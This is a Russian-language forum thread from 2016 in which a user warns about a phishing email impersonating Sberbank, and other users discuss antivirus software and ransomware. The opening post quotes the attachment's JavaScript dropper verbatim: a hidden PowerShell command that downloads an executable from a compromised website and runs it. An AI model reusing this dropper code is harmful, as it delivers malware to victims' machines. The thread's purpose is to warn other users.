| 0
- 10.08.2016 - 17:18
|
Интересное письмо пришло с адреса osipov.s@sbr.ru: Уважаемый клиент! ОАО "Сбербанк" желает Вам приятного дня. Пожалуйста, внимание на счет в приложении. По всем вопросам обращайтесь к нашим менеджерам. С уважением Павел Осипов. Менеджер по работе с индивидуальными клиентами --- приложен файл "выписка426.zip", где находится ява-скрипт следующего содержания: var lidizzz = new ActiveXObject("shell.application"); lidizzz.ShellExecute("cmd.exe", "/c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://www.see21dale.com/wp-content/plugins/libravatar-replace/vipiska.exe','%APPDATA%.exe');Start-Process '%APPDATA%.exe'", "", "open", 0); var CnQDSbuOWkzeHCF = 582724; Что-то там скачивает из интернета и потом запускает. Корочи, будьте бдительны. А вы часто вирусы ловите или всегда предохраняетесь? Какой антивирус стоит?     | | |
| 1
- 10.08.2016 - 17:20
|
я сообщения с незнакомых адресов с вложениями вообще не открываю никогда и сразу в спам посылаю. п.с. стоит лицензионный аваст. | | |
| 2
- 10.08.2016 - 17:24
|
Тут и адрес email выглядит правдоподобно: osipov.s@sbr.ru: Прям, как будто действительно из Сбербанка шлют. | | |
| 3
- 10.08.2016 - 17:25
| 2-Marr >да хоть от самого медведева. с вложениями - сразу втопку. | | |
| 4
- 10.08.2016 - 17:26
|
Аваст Я не открываю незнакомые ссылки А сбер все шлет по смс | | |
| 5
- 10.08.2016 - 17:28
| 0-Marr > KIS лицензия стоит. Вирусов не видел давно, даже не знаю просто их нет или благодаря антивирю? | | |
| 6
- 10.08.2016 - 17:29
| 3-gasana > а если фотки шлют или доки? Что значит с вложениями в топку? | | |
| 7
- 10.08.2016 - 17:30
| Кстати, под этим вложением mail.ru как обычно написало "Вирусов нет. Проверено антивирусом Касперского" :) | | |
| 8
- 10.08.2016 - 17:31
|
6-Стажер >сразу? не предупредив?) я не про корпоративную почту есличо. а про личный ящик. | | |
| 9
- 10.08.2016 - 17:38
|
8-gasana > ну и про личный ящик. Я открываю все что не опасно. опасные вложения почтовик и сам блокирует и КИС блокирует и глазами отличаю. И что значит сразу? Ну вот помнится фоткались на экскурсии, я оставил ящик просил фотки скинуть. Скинули. Ну было штук 12 писем с архивами 7z с jpg внутри, чего не открыть? Другое дело если ярлык там или url файл или вовсе экзешник - тогда ясное дело запускать не надо :) | | |
| 10
- 10.08.2016 - 17:44
| 0-никогда спам не открываю, удаляю. | | |
| 11
- 10.08.2016 - 17:46
| 9-Стажер >по фразе в теме письма можно это определить даже его не открывая :-) | | |
| 12
- 10.08.2016 - 17:47
| Что-то стоит. Каждый месяц ввожу ключи. | | |
| 13
- 10.08.2016 - 18:12
| 0-Marr >два дня назад сдал кровь из вены для проверки на инфекции. | | |
| 14
- 10.08.2016 - 18:15
| 13-SIMATIC >серьёзно ты обеспокоен. | | |
| 15
- 10.08.2016 - 18:22
| че то как-то подозрительно выглядит сообщение все равно. может позвонить им и спросить, возможно ли получить такое письмо? | | |
| 16
- 10.08.2016 - 18:44
| Цитата:
| | |
| 17
- 10.08.2016 - 18:58
| судя по dale.com/wp это либо массад либо ми-7 )) | | |
| 19
- 10.08.2016 - 19:06
| Цитата:
есть масса бесплатных антивирусов - AVG и т.д. | | |
| 20
- 10.08.2016 - 19:15
| 19-F11 > от запуска этого скрипта антивирус не спасет. Тем более, что касперский показывает - вируса внутри архива нет. | | |
| 21
- 10.08.2016 - 19:17
| 20-Marr > спасибо что предупредил | | |
| 22
- 10.08.2016 - 20:00
| 14-ГолаяПравда > да вообще.. | | |
| 23
- 10.08.2016 - 20:28
| я презарватив одел на ноут | | |
| 24
- 10.08.2016 - 20:37
| 23- Думаешь поможет?! | | |
| 25
- 10.08.2016 - 20:48
| 24-Veronika_S >я не думаю, а знаю. В ай-ти сфере же работаю. | | |
| 26
- 11.08.2016 - 10:31
| 25- Вам их там выдают в неограниченном количестве?))) | | |
| 27
- 11.08.2016 - 10:40
| 26-Veronika_S >ага, прячем по карманам, для личного использования. | | |
| Модератор 28
- 11.08.2016 - 11:33
| баянище же :)) | | |
| Модератор 29
- 11.08.2016 - 11:34
| 2-Marr > посмотри домен.. sbr.ru - пустое имя.. на продажу..никакого отношения к сберу не имеет... элементарно же :) | | |
| 30
- 11.08.2016 - 11:47
| Пользуюсь AVG, давно уже, нормально. | | |
| 31
- 11.08.2016 - 13:04
| Это не вирус. Никакой антивирус не поможет. Это самый обычный скрипт файл, который уже скачивает непонятно что с левого сайта и запускает с помощью оболочки PowerShell. Что сделает загруженный файл - бог весть. Реальная защита только одна: любое вложение проверять на свойства. Не веря никому. Хоть от самого Темнейшего мыло придет :-). Но доступно не каждому, да. Клевещут, что в DNC именно так и попались. | | |
| 32
- 11.08.2016 - 13:08
| Нет личной почты на бесплатных серверах. А в корпоративную сомнительным письмам не прорваться. | | |
| 33
- 11.08.2016 - 13:31
|
31-Colder >похож на шифровальщик с именем vipiska.exe Друг на работе пропустил подобное письмо и Каспер не помог. зашифровал он ему весь диск. За ключ попросили 15 т.р. | | |
| 34
- 11.08.2016 - 13:33
|
На компе юзаю третий год симантек антивирус. Стоит не особо дорого, около тысячи в год. Вполне меня устраивает, никаких проблем за это время не было. ЗЫ. Но я и по порносайтам не шляюсь, где шифровальщики обычно, гнездятся. | | |
| 35
- 11.08.2016 - 13:40
| 34-SIMATIC > Антивирус борется с вирусами, а со скриптом, который стартует сам пользователь можно бороться только ограничением пользовательских прав на доступ к файлам, либо созданием виртуальной машины вне локального доступа. | | |
| 36
- 11.08.2016 - 13:51
|
35-BoiledEyeInTheRectum > да это понятно, но автор спросил про вирусы, я ответил ) ЗЫ. Для потенциально опасных сайтов типа зайцев.нет и иже с ним использую параллельно установленный на ноуте Линукс. | | |
| 37
- 11.08.2016 - 18:59
|
Купил планшет а в нем оказался вшитый вирус ( Придётся сдать в магазин... Чувствую мороки будет много.((( В общем интернет растёт развивается и потребители интернета это всего лишь ходячие кошельки... Так что чегото хорошего от интернета ждать глупо... | | |
| 38
- 11.08.2016 - 19:08
| 37-Ginger > а что за планшет такой с вирусом? | | |
| 39
- 11.08.2016 - 19:34
| 38-Marr >TEXET X-pad... Дешевенький конечно, но все равно такая подлянка как вшитый в базовую прогу вирус это уже перебор... Вирус не особо зловредный, просто регулярно вывешивает банеры приглашающие на платные сайты. Раздражает ( | | |
| 40
- 11.08.2016 - 20:01
| 39-Ginger > может быть вы как-то подхватили этот вирус и он заразил базовую прогу? Или по отзывам у многих такие проблемы? | |
Интернет-форум Краснодарского края и Краснодара |
